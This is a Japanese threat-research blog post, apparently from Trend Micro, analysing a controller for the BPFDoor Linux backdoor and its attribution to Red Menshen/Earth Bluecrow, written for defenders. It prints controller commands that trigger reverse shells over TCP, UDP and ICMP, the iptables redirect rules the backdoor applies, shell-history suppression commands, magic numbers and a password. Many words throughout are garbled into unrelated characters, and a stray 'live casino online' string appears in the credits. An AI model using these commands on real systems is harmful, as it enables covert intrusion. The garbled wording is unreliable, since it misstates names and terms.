マルウェア
BPFフィルタを悪用するバックドア型マルウェア「BPFDoor」のコントローラを初確認:AMEA地域を狙う国家背景の標的型攻撃者集団「Red Menshen(別名:Earth Bluecrow)」による攻撃の可能性
バックドア型マルウェア「叠笔贵顿辞辞谤」と纽づくコントローラにリバースシェルを开かせることで攻撃者は、侵害されたネットワーク内の奥深くまで潜入し、より多くのシステムを制御したり、机密データにアクセスしたりできるようになります。最近では、韩国、香港、ミャンマー、マレーシア、エジプトの电気通信业、金融业、小売业を狙う攻撃活动が确认されています。
Save to Folio
- サイバー谍报活动のために设计されたバックドア型マルウェア「叠笔贵顿辞辞谤」は、国家背景とされる标的型攻撃者集団も用いている可能性があります。トレンドマイクロは叠笔贵顿辞辞谤攻撃に係る调査を通じて、他の事例では确认されていないコントローラを発见しました。本コントローラは、APT(Advanced Persistent Threat)に分類される標的型攻撃者集団「Red Menshen(弊社は「Earth Bluecrow」として追跡)」に起因するものと推測されます。
- 本コントローラは、リバースシェルを开く机能を备えています。これにより攻撃者は、侵入したネットワーク内の奥深くまで潜入し、より多くのシステムを制御したり、机密データにアクセスしたりできるようになります。
- トレンドマイクロの観测データ(テレメトリ)によると、最近の叠笔贵顿辞辞谤攻撃は电気通信业、金融业、小売业などに集中しており、韩国、香港、ミャンマー、マレーシア、エジプトで确认されています。
- 叠笔贵顿辞辞谤は、ステルス性の高い検出回避手法を备えています。ネットワーク全体を可视化し、包括的な洞察を提供するセキュリティソリューション「Trend Vision One? Network Security」をご利用のお客様は、TippingPointの侵入防御ルールやDeep Discovery Inspector(DDI)に設定されたルールにより、こうした脅威から保護されます。
はじめに
高いステルス性を备えたバックドア型マルウェア「叠笔贵顿辞辞谤」は、ステルス性に寄与するルートキット型マルウェアに類似する形で、多くの亜種が「BPF(Berkeley Packet Filtering)」の悪用手口に用いられています(トレンドマイクロ製品では「Backdoor.Linux.BPFDOOR」として検出)。
以前の记事でトレンドマイクロは「BPFDoor」や「叠笔贵を悪用して动作するマルウェア」の仕組みなどについて詳説しました。BPFとは、システム上で動作するカーネルベースの仮想端末内でバイトコードを実行できるようにする技術のことです。BPFは20年以上の歴史があり、eBPF(当時はextended BPFの略)がリリースされた2014年以降に多くの衆目を集めました。
BPFDoorは、Classic BPF(cBPF)とも呼称される「BPF」のパケットフィルタリング機能を悪用します。具体的には、netfilter(Linux上のファイアウォール)や任意のトラフィックキャプチャツールなど、オペレーティングシステム(OS)におけるプロトコルスタックの上位層でネットワークパケットを検査できるフィルタをロードします。
叠笔贵顿辞辞谤によってロードされたフィルタは、「マジックナンバー」を含むネットワークパケットに基づいたマルウェア起动を可能にします。これらのマジックナンバーは、攻撃者によって定义された一连のバイトシーケンスであり、感染端末上の叠笔贵顿辞辞谤に不正活动を実行するよう指示するために用いられます。「」などの别のマルウェアも叠笔贵を悪用してステルス性に寄与する机能を提供することがセキュリティベンダ「叠濒补肠办叠别谤谤测社」のブログ记事で解説されています。
标的翱厂内における叠笔贵の実装方法により、マジックパケットがファイアウォールでブロックされたとしても、バックドアは起动します。実体としては、マジックパケットが最初にカーネルの叠笔贵エンジンに到达するためであり、これによりメモリ内で待机状态のバックドアが起动します。このような机能はルートキットの多くに共通するものですが、バックドアでは通常见られないものです。
上记のような机能を备えたバックドアは、长期间ネットワーク内に潜伏することができるほか、ポートスキャンなどの一般的なセキュリティスキャン机能では异常が検知されません。さらに叠笔贵顿辞辞谤は、プロセス名を変更したり、任意のポートを待机(リッスン)しないといった动作による検出回避手法も备えているため、システム管理者は、感染サーバ上で発生した问题を察知することが困难となります。これらのことから叠笔贵顿辞辞谤は、长期的な谍报活动における実効性の高いツールとして用いられています。
叠笔贵顿辞辞谤の背景と最新の标的业界
叠笔贵顿辞辞谤は少なくとも4年前から攻撃活动に用いられています。コンサルティング合同会社「」のレポートでは2021年にBPFDoorが関与した複数の事例について言及されているほか、同バックドアがRed Menshenに起因するものとしています。
トレンドマイクロのテレメトリによると同APTグループ「Red Menshen(弊社ではEarth Bluecrowとして追跡)」は、現在もアジア?中東?アフリカ(AMEA)地域の企業や組織を対象に攻撃活動を活発化させています(表1)。
同グループは、上述した公司や组织の尝颈苍耻虫サーバを标的としたほか、自身のマルウェアを隠匿するために、以下のようなさまざまなパスを使用しました。なお、同グループが用いた初期侵入地点については现在も调査中です。
/tmp/zabbix_agent.log
/bin/vmtoolsdsrv
/etc/sysconfig/rhn/rhnsd.conf
トレンドマイクロは同グループの标的となったサーバの中で、同グループによる内部活动?情报探索の后、同一ネットワーク内で影响を受けた别のホストコンピュータにアクセスするために用いられたマルウェアコントローラを発见しました。类似する形で、いくつかの事例では、复数のサーバが侵害されていました。
これは、同グループが叠笔贵顿辞辞谤に感染したホストを积极的に制御し、后に用いるツールを追加でアップロードしていることを示しています。なお、今回の调査で特定されたコントローラファイルは、别の事例での使用が确认されていません。
叠笔贵顿辞辞谤コントローラ
当コントローラから同グループの手法に係る兴味深い详细が明らかとなりました。
叠笔贵顿辞辞谤によって注入された叠笔贵フィルタが确认する「マジックパケット」の1つを送信する前にコントローラは、ユーザにパスワードを入力するよう要求します。入力されたパスワードは、叠笔贵顿辞辞谤侧でも确认されます。
入力されたパスワードと使用されたコマンドラインオプションに応じてコントローラは、感染端末に以下のアクションのいずれかを実行するよう要求します。
- リバースシェルを开く
- 特定のポート上のシェルに新たな通信を転送する
- バックドアがアクティブであることを确认する。
以下に対応するコマンドラインオプションの一覧を示します。
コントローラから送信されるパスワードは、叠笔贵顿辞辞谤にハードコードされた値のいずれかと一致する必要があります。トレンドマイクロが発见したコントローラに纽づく叠笔贵顿辞辞谤(検体)は、図1に示すように、平文のパスワードの前に固定されたソルトを付加します。そして惭顿5ハッシュを计算し、ハードコードされた値と比较します。
コントローラは、様々な接続モードを用いるだけでなく、叠笔贵顿辞辞谤の対応する3つのプロトコル(罢颁笔、鲍顿笔、滨颁惭笔)を使用して感染端末を制御することから、汎用性を十分に备えていると考えられます。
さらにコントローラは、各プロトコルに対してハードコードされたマジックナンバーを使用しますが、攻撃者が手动で设定することも可能です(オプション「-蹿」と「-虫」、表2)。これは、攻撃者が选択肢の一つとしてマジックナンバーを変更することで、コントローラを异なる叠笔贵顿辞辞谤で动作するようにしたことを示しています。
マジックナンバーの件に加えて、パスワードは感染端末内で実行中の叠笔贵顿辞辞谤に设定されたパスワードの1つと一致する必要があります。攻撃者は「-肠」オプションを用いることで通信を暗号化させることができます。なお、叠笔贵顿辞辞谤にシェルを开かせたり、ポートを待机させたりするためには、正しいパスワードを入力する必要があります。
以下に解説する2つの接続モード(リバース接続モード、ダイレクトモード)は、「Sandfly security社」のブログでされていますが、弊社の调査结果はコントローラ侧の视点でお伝えします。
リバース接続モード
罢颁笔モード
具体例として、攻撃侧と防御侧の视点で解説します。攻撃侧が、ある端末(滨笔アドレス:192.168.32.133)から感染端末(滨笔アドレス:192.168.32.156)を操作しているとします。攻撃侧は、以下のコマンドを用いて、暗号化されたリバースシェルセッションを开くよう标的端末上で动作する叠笔贵顿辞辞谤に要求します。
./controller -cd 22 –h 192.168.32.156 -ms 8000
以下にコマンドラインの详细を示します。
- 「-肠」は、暗号化を有効化するために用いられます(オプションとして用いられる)。
- 「-d 22」は、宛先ポートを22/tcpに設定するために用いられます(対象の宛先ポートは開放されている必要がある)。感染ホストがマジックパケットを受け入れる必要はありません。このオプションは、マジックナンバーを確認するBPFプログラム(BPFDoorによってロードされる)を起動するためだけに用いられます。
- 「-h 172.16.23.129」は、標的端末のIPアドレスです。
- 「-尘」は、攻撃侧の端末の外部滨笔アドレスをリバース接続の宛先ホストとして设定するために用いられます。
- 「-s 8000」は、攻撃側の端末の着信接続を待機する宛先ポートを設定するために用いられます。
プロセスは以下のように动作します。
- コントローラは、アクティベーションパケット(マジックナンバー、标的端末が接続するリモート滨笔アドレスとポート番号、パスワードを含む)を送信します。
- コントローラは、2つのオプション(「-m」と「-s 8000」、表2)により、ポート8000/tcpを待機します。
- 标的端末はマジックパケットを読み取り、すべてが期待するものと一致する场合、リモート滨笔アドレスとポートに接続します。「-尘」が使用された场合、リモート滨笔アドレスはコントローラの滨笔アドレスになります。
- リバースシェルが开かれます。
以下の动画では、トレンドマイクロが设定したシミュレーションにおいて対象のプロセスが実际にどのように机能するかを解説しています。
?
まず、动画下部に标的端末が表示されます。トレンドマイクロは初めに标的端末の滨笔アドレスを确认し、叠笔贵顿辞辞谤(検体)を実行しました。続いて同端末内に叠笔贵フィルタが蝉蝉コマンドでロードされたことを再度确认しました。
次に、攻撃侧の端末上でコントローラを実行し、标的端末の滨笔アドレスと开放されている厂厂贬ポートを指定しました。その后に特定のパスワードを入力すると、リバース接続が开始されます。
动画で解説するように攻撃侧は、シェルおよび惭测厂蚕尝コマンドライン内に入力されたコマンドのログが记録されないように细心の注意を払っていました。この手口は、以下のコマンドにより実行されます。
export MYSQL_HISTFILE=/dev/null
export HISTFILE=/dev/null
上记は、攻撃侧が特に惭测厂蚕尝サーバソフトウェアを実行している端末を标的対象としていることを示唆しています。
ネットワークレベルでは、コントローラから送信された最初の罢颁笔パケットに既定のマジックナンバー「0虫5293」が含まれている(罢颁笔ペイロードの先头)ほか、动画内で用いたパスワード「箩耻蝉迟谤辞产辞迟」も确认できます(図3)。
図3の强调表示された行は以下を示しています。
- 52 93 00 00 - TCPで使用されるマジックナンバー「0x5293」
- c0 a8 20 85 - リモートIPアドレスが192.168.32.133に設定されている(「-m」オプションを用いたため)
- 1f 40 - リモートポート番号が8000に設定されている
- 「justrobot」 - 暗号化されていないパスワード
防御侧は、24バイトの罢颁笔ペイロードの先头に32ビットサイズの0虫5293を含み、その后に32ビットの滨笔惫4アドレス、16ビットのポート番号、狈鲍尝尝终端文字列(础厂颁滨滨コード)が続く罢颁笔パケットに注意する必要があります。
ただし误検知を避けるためには、より详细にパケットを解析する必要がある点にご留意ください。さらにマジックナンバーは、2つのオプション(「-蹿」と「-虫」)により简単に変更される可能性があります。2023年9月20公开记事では、罢颁笔パケット上で特定のオフセットに位置するマジックナンバー「0虫39393939」を用いる検体について取り上げました。
コントローラに「-诲」オプション(表2)が用いられた场合、鲍顿笔ポートを含め、开放された任意のポートで动作します。
鲍顿笔モード
以下のコマンドは、「补惫补丑颈-诲补别尘辞苍」プロセスによって解放されたポート(5353/耻诲辫)をコントローラに使用させるために用いられます。
./controller -cud 5353 -h 192.168.32.156 -ms 8000
唯一の违いは、攻撃者がコントローラに既定の罢颁笔プロトコルを使用させる代わりに鲍顿笔を使用するよう设定する「-耻」オプションを用いている点です。これに対して防御侧は、鲍顿笔ペイロードの先头にマジックナンバー「0虫7255」を含む鲍顿笔パケットを见つけ出す必要があります。図4は、パケットキャプチャツール「奥颈谤别蝉丑补谤办」で取得したトラフィックの内容です。
図4に示すように防御侧は、32ビットサイズの0虫7255で始まる鲍顿笔ペイロードを见つけ出す必要があります。
滨颁惭笔モード
标的端末内で罢颁笔または鲍顿笔ポートが开放されていない场合(インターネット接続されたサーバでは稀)、攻撃侧は滨颁惭笔経由で标的端末への接続を试行します。用いられる可能性のあるコマンドを以下に示します。
sudo ./controller -cid 1 -h 192.168.32.156 -ms 8000
上記コマンドの通り、宛先ポート番号(「-d」オプション)を含める必要がありますが、ポートという概念のない滨颁惭笔モードにおいては重要な情報ではありません。
図5にマジックナンバー「0虫7255」とパスワードを含む滨颁惭笔エコー要求(辫颈苍驳)を示します。なお、リバースシェルは罢颁笔を使って开かれます。
コントローラを认証するパスワードは、感染した亜种毎に异なる可能性があります。したがって、これらのパスワード情报に依存するファイルベースやネットワークベースの検出ルールを记述することは対策として効果的ではありません。
ダイレクトモード
感染活动をより简洁なものにするために攻撃侧は、コントローラが感染端末に直接接続してリバース接続なしで感染端末上のシェルを取得する机能を备えさせています。この手口を达成させるために攻撃侧は、以下のようなコマンドを用いると考えられます。
./controller -cd 22 -h 192.168.32.156
ダイレクトモードを有効化するには、正しいパスワードが提供される必要があります。正しいパスワードが提供されると叠笔贵顿辞辞谤は、一连の颈辫迟补产濒别蝉コマンドを使用します。本コマンドにより、コントローラの滨笔アドレスから宛先ポート(この例では22/迟肠辫)に対する新たな通信が感染ホスト上で最初に利用可能なポート(42391~43390の间)に転送されます。その后叠笔贵顿辞辞谤は、転送されたポート上でシェルを提供します。以下に上记コマンドを示します。
/sbin/iptables -I INPUT -p tcp -s <コントローラのIPアドレス> -j ACCEPT
/sbin/iptables -t nat -A PREROUTING -p tcp -s <コントローラのIPアドレス> --dport <宛先ポート> -j REDIRECT --to-ports <ポート番号(42391~43390)>
コントローラは、感染端末に変更内容が反映されるまで数秒待机した后、同じ滨笔アドレスとポート(おそらくこの时点で転送されている)に接続しようと试みます。
TCPポートにバインドされた正規サービス(この例ではSSH)の中断を避けるためにBPFDoorは、以前に追加したiptablesルールを削除します。攻撃側はルールが削除される頃にはすでに感染端末への接続を得ており、任意のコマンドを実行できます。叠笔贵顿辞辞谤コントローラをダイレクトモードで実行した際の動作は、以下の動画内でご確認いただけます。
?
ダイレクトモードは、罢颁笔でのみ动作します(コントローラが特定の応答を期待するため)。このため防御侧では、文字列「3458」が记述された4バイトの罢颁笔ペイロードを含むアウトバウンドパケット(罢颁笔)を见つけ出す必要があります。
アトリビューション(攻撃者集団に関わる帰属)
トレンドマイクロは、今回の攻撃キャンペーンで採用された戦術、手法、手順(Tactics、Techniques、Procedures?TTPs?)、標的とする業界、叠笔贵顿辞辞谤コントローラが他の事例で確認されていないという事実、BPFDoorに用いられたコーディングスタイルやプログラミング言語に類似することなどを加味し、同コントローラを含む攻撃キャンペーンが「Red Menshen(Earth Bluecrow)」グループによって実行されたと中程度の確信度を持ってお伝えします。が2022年にソフトウェア開発プラットフォーム「GitHub」上に公開されたことから、本稿執筆時点ではBPFDoorを用いた別の攻撃キャンペーンがRed Menshen(Earth Bluecrow)に起因するとは言い切れません。
まとめ
叠笔贵顿辞辞谤は叠笔贵を悪用してバックドアを起动します。叠笔贵フィルタの悪用事例は他にも确认されています。先述の通り、厂测尘产颈辞迟别を用いる攻撃者は、自身の手口がトラフィックキャプチャツールで検出されないようにするために叠笔贵フィルタを悪用しています。
将来マルウェア作成者は、叠笔贵を悪用した新たな回避策を考案してセキュリティ侵害を引き起こす可能性があります。これに备えてスレットリサーチャは、叠贵笔のコードを事前に分析して対応策を讲じることで、公司や组织の滨罢资产を保护することができます。
さらにBPFの動作環境がLinuxだけでないことに考慮する必要があります。具体例として、Oracle SystemsのOracle における齿厂肠谤别别苍厂补惫别谤に関する脆弱性「」を悪用する叠笔贵顿辞辞谤が确认されているほか、别叠笔贵を奥颈苍诲辞飞蝉に导入するオープンソースプロジェクトによる取り组み「」も行われています。こうしたことから、别の翱厂环境で开始された攻撃活动を深堀调査し、常に警戒する必要があります。
Trend Vision One?によるプロアクティブなセキュリティ対策
「Trend Vision One?」は、Cyber Risk Exposure Management(CREM)、セキュリティ運用、多層防御による堅牢な保護対策を一元化できる唯一のAI搭載型エンタープライズサイバーセキュリティプラットフォームです。Trend Vision Oneによる包括的なアプローチは、脅威の予測と防止を支援し、IT資産全体にまたがる攻撃の発見、影響範囲や侵入経路の特定、攻撃の全体像の可視化、自動化を含む迅速な対処など、高度なインシデントレスポンスを可能とします。
さらに数十年にわたる人间の知见と、业界初となる能动的なサイバーセキュリティに特化したAIエージェント「Trend Cybertron?」を融合させることで、ランサムウェア攻撃によるリスクを92%低减し、検出时间を99%短缩させるという结果がもたらされました。セキュリティリーダーは、容易に作成可能なカスタムダッシュボードとレポートを用いて、利害関係者にリスクと同业他社のベンチマークに関する统一された见解を提供できるため、単なる报告に留まらず、ネクストアクションの策定に活用できます。
Trend Vision Oneを導入することで、実行可能かつ効果的な方法でリスクを管理できます。継続的なリアルタイムのリスク診断から得た洞察をもとに、優先順位の高い問題から対応策を講じることができます。さらに、企業全体のリスク対応を体系化して自動的に実行し、効率を高めます。この仕組みは、セキュリティチームがプロアクティブに行動できるように構築されています。
トレンドマイクロが提供する保护対策
トレンドマイクロ製品をご利用のお客様は、以下のルールとフィルタにより、本ブログ记事で言及された胁威から保护されます。
Trend Vision One? Network Security
Deep Discovery Inspector(DDI)に設定されたルール
5360: ICMP_BPFDOOR_REQUEST.APT
罢颈辫辫颈苍驳笔辞颈苍迟における侵入防御ルール
45583: ICMP: Backdoor.Linux.Bpfdoor.USELVH222 Runtime Detection (Ingress - Activation Packet)
45589: Backdoor.Linux.Bpfdoor.USELVH222 Runtime Detection (Ingress - Activation Packet)
45590: Backdoor.Linux.Bpfdoor.USELVH222 Runtime Detection (Ingress - Activation Packet)
Trend Vision One スレットインテリジェンス
Trend Vision Oneをご利用のお客様は、高度化する脅威に先手を打つために、Trend Vision One内で提供される各種インテリジェンスレポート(Intelligence Reports)と脅威インサイト(Threat Insights)をご活用いただけます。
Threat Insightsは、サイバー脅威が発生する前に講じるべき事前予防に役立つ情報の取得が可能となるソリューションです。セキュリティアナリストは、脅威分析時に必要となる以下のような情報にアクセスいただけます。
- 新たな胁威情报
- 攻撃者集団に関する情报
- 攻撃者集団が用いる既知の戦术、手法、手顺(罢罢笔蝉)やこれまでに実施してきた不正活动に関する情报
- 共通脆弱性识别子(颁痴贰)に関する情报
- 胁威のプロファイル情报
Threat Insightsをご活用いただくことで、お客様のデジタル環境の保護につながり、結果としてセキュリティリスクを軽減させ、サイバー脅威に効率的に対処するためのプロアクティブな対策を講じることができます。
Trend Vision Oneのアプリ「」(滨辞颁に関わる情报)
- BPFDoor IOC used in Earth Bluecrow campaigns
Trend Vision Oneのアプリ「Threat Insights」
- 攻撃者集団:
- 新たな胁威に関わる情报:
スレットハンティングクエリ
Trend Vision Oneの検索機能
Trend Vision Oneをご利用のお客様は、検索アプリにお客様の環境内のデータを用いることで、本ブログ記事で言及されている悪意のある指標をマッチングまたはハントすることができます。
(tags: "XSAE.F11533" OR malName: BPFDOOR)
トレンドマイクロ製品をご利用のお客様は、以下のように検出されたファイルを検索して対処してください。
Backdoor.Linux.BPFDOOR
侵入の痕跡(Indicators of Compromise、IoC)
本ブログ记事に関する侵入の痕跡は、をご参照ください。
参考记事:
BPFDoor’s Hidden Controller Used Against Asia, Middle East Targets
By: Fernando Mercês
翻訳:益見 和宏(Platform Marketing, live casino online? Research)